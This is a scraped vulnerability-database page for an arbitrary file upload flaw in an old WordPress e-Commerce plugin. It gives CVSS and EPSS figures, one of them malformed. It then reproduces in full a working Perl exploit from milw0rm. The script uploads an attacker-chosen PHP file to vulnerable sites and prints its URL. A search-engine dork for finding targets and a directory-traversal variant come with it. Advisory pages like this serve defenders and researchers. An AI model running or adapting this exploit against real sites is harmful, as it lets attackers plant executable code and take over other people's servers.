CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Unrestricted file upload vulnerability in image_processing.php in the e-Commerce Plugin 3.4 and earlier for Wordpress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/plugins/wp-shopping-cart/.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
7.44%
–
–
2022-04-03
–
–
7.44%
–
–
2023-02-26
–
–
7.44%
–
–
2023-03-12
–
–
–
2.19%
–
2023-08-20
–
–
–
1.98%
–
2023-10-22
–
–
–
1.98%
–
2023-12-03
–
–
–
1.98%
–
2023-12-17
–
–
–
1.98%
–
2024-03-24
–
–
–
1.98%
–
2024-06-02
–
–
–
1.98%
–
2024-06-02
–
–
–
1.98%
–
2024-12-08
–
–
–
1.68%
–
2024-12-22
–
–
–
1.68%
–
2025-01-26
–
–
–
1.68%
–
2025-01-19
–
–
–
1.68%
–
2025-02-02
–
–
–
1.68%
–
2025-03-18
–
–
–
–
2.66%
2025-03-30
–
–
–
–
2.66%
2025-04-06
–
–
–
–
2.66%
2025-04-06
–
–
–
–
2.66,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
my $fname = rand(99999) . ".php"; # no int()
print <<INTRO; # messy print i know..
- Wordpress Plugin e-Commerce <= 3.4 Arbitrary File Upload -
Discovered && Coded by: t0pP8uZz
Discovered on: 20 October 2008
Theres no current vulnerabilitys for this plugin, but the
vulnerability explained here no longer exists in the later
versions of the plugin, due to a code rewrite.
In testing this vulnerability, i wrote a scraping content
program, and found ALOT of vulnerable sites.
This exploit will upload a selected file to the...
... /wp-content/plugins/wp-shopping-cart/ directory.
If the directory is not writable (rare cases) you can
mod this exploit and use the insecure GET variable
"imagedir" to directory traversal.. so you can upload
in diffrent directorys.
Contact: irc.rizon.net #sectalk
Dork: inurl:"/wp-content/plugins/wp-shopping-cart/"
INTRO
print "\nEnter URL(ie: http://site.com/mambo): ";
chomp(my $url=<STDIN>);
print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php',
Content_Type => 'form-data',
Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] );
die "Exploit Failed: HTTP POST Failed!" unless $re->is_success;
if($re->content =~ /Fatal error/i) {
print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n";
print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n";
} else
{
print "Exploit Failed! Target host not vulnerable!\n";
}
exit;
# milw0rm.com [2008-10-29]
Products Mentioned
Configuraton 0
Instinct>>E-commerce_plugin >> Version To (including) 3.4